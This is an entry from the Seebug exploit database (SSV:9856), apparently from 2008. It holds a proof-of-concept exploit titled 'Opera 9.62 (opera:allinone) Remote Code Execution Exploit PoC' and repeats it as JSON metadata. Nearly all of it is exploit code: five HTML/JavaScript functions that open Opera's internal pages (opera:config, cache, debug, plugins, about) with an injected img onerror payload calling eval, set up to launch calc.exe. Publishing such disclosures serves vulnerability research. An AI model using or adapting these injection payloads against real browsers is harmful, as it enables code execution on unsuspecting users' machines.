ID SSV:9856
Type seebug
Reporter Root
Modified 2008-10-31T00:00:00
Description
No description provided by source.
<!--
# OPERA 9.62 Remote Code Execution
# Vulnerability Found By NeoCoderz
# Email : NeoCoderz1[at]msn[dot]com
-->
<html>
<script>
function execcalc() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>
<script>
function execcalca() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>
<script>
function execcalcb() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>
<script>
function execcalcc() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>
<script>
function execcalcd() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>
</html>
{"sourceData": "\n <!--\r\n# OPERA 9.62 Remote Code Execution\r\n# Vulnerability Found By NeoCoderz\r\n# Email : NeoCoderz1[at]msn[dot]com\r\n-->\r\n<html>\r\n<script>\r\nfunction execcalc() {\r\n var abc="c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\calc.exe";\r\n window.open('opera:config?q=q=%2A"><img src=\\'x\\' onerror=\\'eval(abc)\\'>&p=1&s=1');\r\n window.setTimeout("location.href='mailto:'",4000);\r\n}\r\n</script>\r\n<body scrolling="no">\r\n<a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>\r\n<script>\r\nfunction execcalca() {\r\n var abc="c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\calc.exe";\r\n window.open('opera:cache?q=%2A"><img src=\\'x\\' onerror=\\'eval(abc)\\'>&p=1&s=1');\r\n window.setTimeout("location.href='mailto:'",4000);\r\n}\r\n</script>\r\n<body scrolling="no">\r\n<a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>\r\n<script>\r\nfunction execcalcb() {\r\n var abc="c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\calc.exe";\r\n window.open('opera:debug?q=q=%2A"><img src=\\'x\\' onerror=\\'eval(abc)\\'>&p=1&s=1');\r\n window.setTimeout("location.href='mailto:'",4000);\r\n}\r\n</script>\r\n<body scrolling="no">\r\n<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>\r\n<script>\r\nfunction execcalcc() {\r\n var abc="c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\calc.exe";\r\n window.open('opera:plugins?q=%2A"><img src=\\'x\\' onerror=\\'eval(abc)\\'>&p=1&s=1');\r\n window.setTimeout("location.href='mailto:'",4000);\r\n}\r\n</script>\r\n<body scrolling="no">\r\n<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>\r\n<script>\r\nfunction execcalcd() {\r\n var abc="c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\calc.exe";\r\n window.open('opera:about?q=%2A"><img src=\\'x\\' onerror=\\'eval(abc)\\'>&p=1&s=1');\r\n window.setTimeout("location.href='mailto:'",4000);\r\n}\r\n</script>\r\n<body scrolling="no">\r\n<a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>\r\n</html>\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-9856", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-9856", "type": "seebug", "viewCount": 6, "references": [], "lastseen": "2017-11-19T21:22:35", "published": "2008-10-31T00:00:00", "cvelist": [], "id": "SSV:9856", "enchantments_done": [], "modified": "2008-10-31T00:00:00", "title": "Opera 9.62 (opera:allinone) Remote Code Execution Exploit PoC", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645236286}}
{}